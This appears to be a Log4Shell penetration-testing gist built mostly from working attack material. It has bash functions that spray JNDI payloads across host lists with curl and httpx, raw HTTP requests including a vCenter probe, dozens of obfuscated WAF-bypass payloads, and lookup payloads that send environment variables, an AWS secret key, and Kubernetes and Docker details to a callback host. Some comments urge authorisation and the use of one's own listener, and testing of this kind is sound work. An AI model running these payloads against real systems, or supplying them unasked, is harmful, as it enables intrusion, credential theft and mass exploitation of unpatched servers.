# Log4Shell: some proven testing methods. Use only against systems you are authorised to test, and replace every callback domain below (canarytokens.com, oastify.com, requestcatcher.com) with a listener you control -- as written, every hit is reported to the gist author, not to you. | |
# Oneliner 1: | |
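# Oneliner 1: build a fuzz list of "<host>/${jndi:ldap://<host>.<oob>/a}" targets and feed it
# to httpx. The target host is embedded as a label of the callback name, so a DNS/LDAP hit on
# the listener tells you which host resolved it.
# SECURITY: the default callback is the gist author's Canarytoken -- running this as-is reports
# every vulnerable host you find (by name) to a third party. Export OOB_DOMAIN=<listener you
# control> first, and only test hosts you are authorised to test.
l4s_build_fuzzlist() {
  local hosts_file=$1 out_file=$2 host
  local oob=${OOB_DOMAIN:-L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com}
  # "|| [[ -n $host ]]" also processes a last line that lacks a trailing newline.
  while IFS= read -r host || [[ -n $host ]]; do
    host=${host#http://}    # same effect as the original sed 's/https\?:\/\///'
    host=${host#https://}
    [[ -z $host ]] && continue
    # Single-quoted format: ${jndi:...} must reach httpx literally, not be expanded by bash.
    printf '%s/${jndi:ldap://%s.%s/a}\n' "$host" "$host" "$oob"
  done < "$hosts_file" >> "$out_file"   # >> appends like the original; delete the list to start fresh
}
if [[ -r vulnerable-hosts.txt ]]; then
  l4s_build_fuzzlist vulnerable-hosts.txt L4SFuzzList
  httpx -l L4SFuzzList
else
  printf 'vulnerable-hosts.txt not found; nothing to do\n' >&2
fi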
#Oneliner 2: | |
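# Oneliner 2: hit each host once, carrying the probe in the query string, X-Api-Version and
# User-Agent (Credit: https://twitter.com/HackerGautam/status/1469751218926882816).
# Fix vs. the original one-liner: the payloads sat inside double quotes, so bash tried to
# expand ${jndi:ldap://...} itself (as a ${var:offset} substring expansion) and aborted with a
# substitution/arithmetic error -- the probe never reached the target. The literal text is
# now produced by a single-quoted printf format.
# SECURITY: by default the callback is the gist author's Canarytoken (and one header originally
# called a public requestcatcher.com endpoint). Export OOB_DOMAIN=<listener you control> first.
l4s_payload() {
  local oob=${OOB_DOMAIN:-L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com}
  # Single quotes keep ${jndi:...} literal; only %s is substituted, by printf.
  printf '${jndi:ldap://%s/a}' "$oob"
}
l4s_probe_hosts() {
  local hosts_file=$1 host payload
  payload=$(l4s_payload)
  while IFS= read -r host || [[ -n $host ]]; do
    [[ -z $host ]] && continue
    # -k already means --insecure; --path-as-is keeps the ${...} in the URL untouched by curl.
    curl -sk --path-as-is "$host/?test=$payload" \
      -H "X-Api-Version: $payload" \
      -H "User-Agent: $payload"
  done < "$hosts_file"
}
if [[ -r 1.txt ]]; then
  l4s_probe_hosts 1.txt
else
  printf '1.txt not found; nothing to probe\n' >&2
fi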
# A great resource to learn from (and earn with): | |
https://github.com/pentesterland/Log4Shell | |
# Header spray / "shotgun" mode (run at your own risk: it can disrupt the target). It produces many false positives, so confirm every hit with another tool before treating it as validated: | |
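# Header spray: one request per host with the same ${jndi:...} probe in every header that
# commonly ends up in Log4j output. Fixes vs. the original one-liner: the duplicated
# -H User-Agent / Accept-Language / Cookie flags are collapsed (both cookies ride in a single
# Cookie header); the X-Forwarded-For value that carried a stray backslash and a different
# callback domain now uses the same probe as the rest; the header value that was wrapped over
# two lines no longer embeds a newline in the request.
# SECURITY: defaults to the gist author's Canarytoken; export OOB_DOMAIN=<listener you control>.
l4s_spray_headers() {
  local hosts_file=$1 oob payload name
  oob=${OOB_DOMAIN:-L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com}
  # ${hostName} is a Log4j lookup, not a shell variable: build with a single-quoted printf
  # format so both ${...} reach httpx literally.
  payload=$(printf '${jndi:ldap://x${hostName}.%s/a}' "$oob")
  local -a headers=(
    X-Api-Version User-Agent Referer Origin Accept-Language
    X-Forwarded-By X-Forwarded-For X-Forwarded-For-Original X-Forwarded-Host X-Forwarded-Port
    X-Forwarded-Proto X-Forwarded-Protocol X-Forwarded-Scheme X-Forwarded-Server X-Forwarded-Ssl
    X-Forwarder-For X-Forward-For X-Forward-Proto X-Frame-Options X-From X-Geoip-Country
    X-XSRF-TOKEN Accept Accept-Datetime Accept-Charset Accept-Encoding
  )
  local -a args=(-H "Cookie: mt.v=$payload; CID_CART_COOKIE=$payload")
  for name in "${headers[@]}"; do
    args+=(-H "$name: $payload")
  done
  httpx "${args[@]}" < "$hosts_file"
}
if [[ -r vulnerable-hosts.txt ]]; then
  l4s_spray_headers vulnerable-hosts.txt
else
  printf 'vulnerable-hosts.txt not found; nothing to do\n' >&2
fi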
GET /test?id=%24%7Bj%24%7B::-n%7Ddi:dns%24%7B::-:%7D//quua8mp7vfexh3a3qkf1sggj9%24%7B::-.%7Dcanarytokens.com%7D HTTP/1.1 | |
User-Agent: ${j${::-n}di:dns${::-:}//quua8mp7vfexh3a3qkf1sggj9${::-.}canarytokens.com} | |
Origin: ${j${::-n}di:dns${::-:}//quua8mp7vfexh3a3qkf1sggj9${::-.}canarytokens.com} | |
Referer: ${j${::-n}di:dns${::-:}//quua8mp7vfexh3a3qkf1sggj9${::-.}canarytokens.com} | |
Cookie: LastMRH_Session=***; MRHSession=*** | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Encoding: gzip,deflate,br | |
Host: ****** | |
Connection: Keep-alive | |
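# Cookie-based probe: the ${sys:java.version} lookup is resolved by the target before the
# callback is made, so the target's Java version arrives as a DNS label at the listener.
# SECURITY: whatever the lookup resolves travels in cleartext DNS to whoever owns the callback
# domain -- by default the gist author's Canarytoken. Export OOB_DOMAIN=<listener you control>.
l4s_cookie_probe() {
  local target=$1
  local oob=${OOB_DOMAIN:-L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com}
  # Single-quoted printf format so neither ${jndi:...} nor ${sys:...} is touched by bash.
  curl "$target" -H "$(printf 'Cookie: CU_BRAND=${jndi:ldap://${sys:java.version}.%s/a}' "$oob")"
}
# usage: OOB_DOMAIN=oob.example l4s_cookie_probe test.domain.com
# Only fires when a target is given, instead of hitting the placeholder test.domain.com.
if (( $# )); then
  l4s_cookie_probe "$1"
fi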
# Cookie-based Log4Shell probe. Note: these payloads only make the target perform an outbound JNDI/DNS lookup to the callback domain; they confirm that the vulnerable lookup is evaluated, they do not by themselves execute code. | |
GET / HTTP/2 | |
Host: test.domain.com | |
Referer: https://www.google.com/search?BC=en&q=testing | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 | |
Cookie: mt.v=***; CU_ACT=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}; CID_CART_COOKIE=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}; IBSD_LOCALE=en_US; CU_BRAND=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}; jsession_unique_id=xx888dd667ggddd23454d | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Encoding: gzip,deflate,br | |
# VMware vCenter Log4Shell probe (same callback-only payload, delivered via the analytics telemetry endpoint) | |
POST /analytics/telemetry/ph/api/hyper/send?_c=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a} | |
Host: test.domain.com | |
Upgrade-Insecure-Requests: 1 | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9 | |
Connection: close | |
# Some Great WAF-Bypass Payloads to Play With | |
CREDIT: https://musana.net | |
${jndi:ldap://domain.com/j} | |
${jndi:ldap:/domain.com/a} | |
${jndi:dns:/domain.com} | |
${jndi:dns://domain.com/j} | |
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j} | |
${${::-j}ndi:rmi://domain.com/j} | |
${jndi:rmi://domainldap.com/j} | |
${${lower:jndi}:${lower:rmi}://domain.com/j} | |
${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j} | |
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j} | |
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://domain.com/j} | |
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j} | |
${jndi:${lower:l}${lower:d}a${lower:p}://domain.com} | |
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//domain.com/a} | |
${jn${env::-}di:ldap://domain.com/j} | |
${jn${date:}di${date:':'}ldap://domain.com/j} | |
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://domain.com/j} | |
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://domain.com/j} | |
${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://domain.com/j} | |
${j${::-nD}i${::-:}ldap://domain.com/j} | |
${j${EnV:K5:-nD}i:ldap://domain.com/j} | |
${j${loWer:Nd}i${uPper::}ldap://domain.com/j} | |
${jndi:ldap://127.0.0.1#domain.com/j} | |
${jnd${upper:ı}:ldap://domain.com/j} | |
${jnd${sys:SYS_NAME:-i}:ldap:/domain.com/j} | |
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://domain.com/j} | |
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://domain.com/j} | |
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://domain.com/j} | |
${\u006a\u006e\u0064\u0069:ldap://domain.com/j} | |
${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.domain.com/j} | |
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j} | |
%24%7Bjndi:ldap://domain.com/j%7D | |
%24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D | |
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} (https://twitter.com/BountyOverflow/status/1470001858873802754) | |
1. ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} | |
3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} | |
4. ${jndi:rmi://adsasd.asdasd.asdasd} - https://twitter.com/wugeej/status/1469982901412728832 | |
jndi: | |
jn${env::-}di: | |
jn${date:}di${date:':'} | |
j${k8s:k5:-ND}i${sd:k5:-:} | |
j${main:\k5:-Nd}i${spring:k5:-:} | |
j${sys:k5:-nD}${lower:i${web:k5:-:}} | |
j${::-nD}i${::-:} | |
j${EnV:K5:-nD}i: | |
j${loWer:Nd}i${uPper::} https://twitter.com/ymzkei5/status/1469765165348704256 | |
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: (https://twitter.com/Rezn0k/status/1469523006015750146) | |
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} | |
This gets past every filter I've found so far. There's no shortage of these bypasses. | |
# Different Types of Exploit Confirmation Payloads | |
# Docker Lookup | |
${jndi:ldap://${docker:containerId}.domain.com/j} | |
${jndi:ldap://${docker:containerName}.domain.com/j} | |
${jndi:ldap://${docker:imageId}.domain.com/j} | |
${jndi:ldap://${docker:imageName}.domain.com/j} | |
${jndi:ldap://${docker:shortContainerId}.domain.com/j} | |
${jndi:ldap://${docker:shortImageId}.domain.com/j} | |
# Environment Lookup -- caution: ${env:AWS_SECRET_ACCESS_KEY} below pulls a live cloud credential out of the target and sends it as a cleartext DNS label to whoever owns the callback domain. Use it only with your own listener against authorised targets, and treat any value that comes back as a credential exposure that must be rotated. | |
${jndi:ldap://${env:USER}.domain.com/j} | |
${jndi:ldap://${env:user}.domain.com/j} | |
${jndi:ldap://${env:COMPUTERNAME}.domain.com/j} | |
${jndi:ldap://${env:USERDOMAIN}.domain.com/j} | |
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.domain.com/j} | |
${jndi:ldap://${hostName}.domain.com/j} | |
${jndi:ldap://${env:JAVA_VERSION}.domain.com/j} | |
# Java Lookup | |
${jndi:ldap://${java:version}.domain.com/j} | |
${jndi:ldap://${java:runtime}.domain.com/j} | |
${jndi:ldap://${java:vm}.domain.com/j} | |
${jndi:ldap://${java:os}.domain.com/j} | |
${jndi:ldap://${java:locale}.domain.com/j} | |
${jndi:ldap://${java:hw}.domain.com/j} | |
# Kubernetes Lookup | |
${jndi:ldap://${k8s:accountName}.domain.com/j} | |
${jndi:ldap://${k8s:clusterName}.domain.com/j} | |
${jndi:ldap://${k8s:containerId}.domain.com/j} | |
${jndi:ldap://${k8s:containerName}.domain.com/j} | |
${jndi:ldap://${k8s:host}.domain.com/j} | |
${jndi:ldap://${k8s:hostIp}.domain.com/j} | |
${jndi:ldap://${k8s:labels.app}.domain.com/j} | |
${jndi:ldap://${k8s:labels.podTemplateHash}.domain.com/j} | |
${jndi:ldap://${k8s:masterUrl}.domain.com/j} | |
${jndi:ldap://${k8s:namespaceId}.domain.com/j} | |
${jndi:ldap://${k8s:namespaceName}.domain.com/j} | |
${jndi:ldap://${k8s:podId}.domain.com/j} | |
${jndi:ldap://${k8s:podIp}.domain.com/j} | |
${jndi:ldap://${k8s:podName}.domain.com/j} | |
${jndi:ldap://${k8s:imageId}.domain.com/j} | |
${jndi:ldap://${k8s:imageName}.domain.com/j} | |
${jndi:ldap://.domain.com/j} | |
# Main Arguments Lookup | |
${jndi:ldap://${main:0}.domain.com/j} | |
${jndi:ldap://${main:1}.domain.com/j} | |
${jndi:ldap://${main:2}.domain.com/j} | |
${jndi:ldap://${main:3}.domain.com/j} | |
${jndi:ldap://${main:4}.domain.com/j} | |
${jndi:ldap://${main:\--file}.domain.com/j} | |
${jndi:ldap://${main:\-x}.domain.com/j} | |
${jndi:ldap://${main:bar}.domain.com/j} | |
${jndi:ldap://${main:\--quiet:-true}.domain.com/j} | |
# Web Lookup | |
${jndi:ldap://${web:attr.name}.domain.com/j} | |
${jndi:ldap://${web:contextPath}.domain.com/j} | |
${jndi:ldap://${web:contextPathName}.domain.com/j} | |
${jndi:ldap://${web:effectiveMajorVersion}.domain.com/j} | |
${jndi:ldap://${web:effectiveMinorVersion}.domain.com/j} | |
${jndi:ldap://${web:initParam.name}.domain.com/j} | |
${jndi:ldap://${web:majorVersion}.domain.com/j} | |
${jndi:ldap://${web:minorVersion}.domain.com/j} | |
${jndi:ldap://${web:rootDir}.domain.com/j} | |
${jndi:ldap://${web:serverInfo}.domain.com/j} | |
${jndi:ldap://${web:servletContextName}.domain.com/j} | |
# System Properties Lookup | |
${jndi:ldap://${sys:logPath}.domain.com/j} | |
${jndi:ldap://${sys:java.version}.domain.com/j} | |
${jndi:ldap://${sys:java.vendor}.domain.com/j} | |
# Structured Data Lookup (the example below repeats the ${sys:logPath} system-property lookup from the previous section; the structured-data prefix used elsewhere in this list is ${sd:...}, see the WAF-bypass payloads) | |
${jndi:ldap://${sys:logPath}.domain.com/j} | |
# Date Lookup | |
${jndi:ldap://${date:MM-dd-yyyy}.domain.com/j} | |
# Context Map Lookup | |
${jndi:ldap://${ctx:loginId}.domain.com/j} | |
# Some Great Keywords to play with: | |
Credit: https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a | |
${ctx:loginId} | |
${map:type} | |
$(unknown) | |
${date:MM-dd-yyyy} | |
${docker:containerId} | |
${docker:containerName} | |
${docker:imageName} | |
${env:USER} | |
${event:Marker} | |
${mdc:UserId} | |
${java:runtime} | |
${java:vm} | |
${java:os} | |
${jndi:logging/context-name} | |
${hostName} | |
${docker:containerId} | |
${k8s:accountName} | |
${k8s:clusterName} | |
${k8s:containerId} | |
${k8s:containerName} | |
${k8s:host} | |
${k8s:labels.app} | |
${k8s:labels.podTemplateHash} | |
${k8s:masterUrl} | |
${k8s:namespaceId} | |
${k8s:namespaceName} | |
${k8s:podId} | |
${k8s:podIp} | |
${k8s:podName} | |
${k8s:imageId} | |
${k8s:imageName} | |
${log4j:configLocation} | |
${log4j:configParentLocation} | |
${spring:spring.application.name} | |
${main:myString} | |
${main:0} | |
${main:1} | |
${main:2} | |
${main:3} | |
${main:4} | |
${main:bar} | |
${name} | |
${marker} | |
${marker:name} | |
${spring:profiles.active[0]} | |
${sys:logPath} | |
${web:rootDir} | |
# Some Common Headers to test | |
Accept-Charset | |
Accept-Datetime | |
Accept-Encoding | |
Accept-Language | |
Authorization | |
Authorization: Basic | |
Authorization: Bearer | |
Authorization: Oauth | |
Authorization: Token | |
Cache-Control | |
Cf-Connecting_ip | |
CF-Connecting_IP | |
Client-Ip | |
Client-IP | |
Contact | |
Cookie | |
Destination | |
DNT | |
Forwarded | |
Forwarded-For | |
Forwarded-For-Ip | |
Forwarded-Proto | |
From | |
If-Modified-Since | |
Max-Forwards | |
Origin | |
Originating-Ip | |
Pragma | |
Profile | |
Proxy | |
Proxy-Host | |
Referer | |
TE | |
True-Client-Ip | |
True-Client-IP | |
Upgrade | |
User-Agent | |
Via | |
Warning | |
X-Api-Version | |
X-Arbitrary | |
X-Att-Deviceid | |
X-ATT-DeviceId | |
X-Client-Ip | |
X-Client-IP | |
X-Correlation-ID | |
X-Csrf-Token | |
X-CSRFToken | |
X-Do-Not-Track | |
X-Foo | |
X-Foo-Bar | |
X-Forwarded | |
X-Forwarded-By | |
X-Forwarded-For | |
X-Forwarded-For-Original | |
X-Forwarded-Host | |
X-Forwarded-Port | |
X-Forwarded-Proto | |
X-Forwarded-Protocol | |
X-Forwarded-Scheme | |
X-Forwarded-Server | |
X-Forwarded-Server | |
X-Forwarded-Ssl | |
X-Forwarder-For | |
X-Forward-For | |
X-Forward-Proto | |
X-Frame-Options | |
X-From | |
X-Geoip-Country | |
X-Host | |
X-Http-Destinationurl | |
X-HTTP-DestinationURL | |
X-Http-Host-Override | |
X-Http-Method | |
X-Http-Method-Override | |
X-HTTP-Method-Override | |
X-Http-Path-Override | |
X-Https | |
X-Htx-Agent | |
X-Hub-Signature | |
X-If-Unmodified-Since | |
X-Imbo-Test-Config | |
X-Insight | |
X-Ip | |
X-Ip-Trail | |
X-Leakix | |
X-Log | |
X-Original-URL | |
X-Originating-Ip | |
X-Originating-IP | |
X-ProxyUser-Ip | |
X-Real-Ip | |
X-Real-IP | |
X-Remote-Addr | |
X-Remote-Ip | |
X-Requested-With | |
X-Request-ID | |
X-UIDH | |
X-Wap-Profile | |
X-XSRF-TOKEN | |
# Best Repo - I use this a lot | |
https://github.com/fullhunt/log4j-scan |